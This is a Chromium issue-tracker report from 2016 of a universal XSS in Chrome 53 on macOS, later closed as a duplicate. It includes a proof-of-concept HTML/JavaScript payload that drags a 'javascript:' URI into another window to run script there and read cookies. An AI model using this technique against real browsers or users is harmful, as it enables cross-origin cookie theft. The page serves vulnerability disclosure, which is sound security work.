Issue metadata
Sign in to add a comment
|
uxss via drag/drop of JavaScript URI
Reported by
m1x...@gmail.com,
Nov 18 2016
|
||||||||||||||||||||||||
Issue descriptionUserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 Steps to reproduce the problem: 1. Browser to the url 2. Click on the button 3. Drag the image What is the expected behavior? Demoļ¼ https://youtu.be/E45Hf14bnYs POC: <button id="qbutt">Click me first</button><br> <img src="https://security.dianrong.com/static/img/logo@1xnew.png" id="qimg"/> <script> qimg.style.setProperty('opacity','0.0'); var f; qbutt.onclick=function(){ qimg.style.setProperty('opacity','1.0'); qbutt.disabled='true'; f=open('data:text/html,<head><title>Drag n Drop HERE!!</title><link rel="prerender" href="http://www.google.com/"></head><body>go back to the main page</body>'); }; document.addEventListener("dragstart", function(event) { event.dataTransfer.setData("text/uri-list", "javascript:alert(document.cookie)"); }); window.ondragleave=function(e){ if(e.offsetX<10){window.f.location=('http://www.google.com/');} }; </script> What went wrong? uxss Did this work before? N/A Chrome version: 53.0.2785.143 Channel: n/a OS Version: OS X 10.12.1 Flash Version: Shockwave Flash 23.0 r0
,
Feb 25 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, Nov 18 2016Mergedinto: 639750
Status: Duplicate (was: Unconfirmed)
Summary: uxss via drag/drop of JavaScript URI (was: Chrome for MacOS uxss)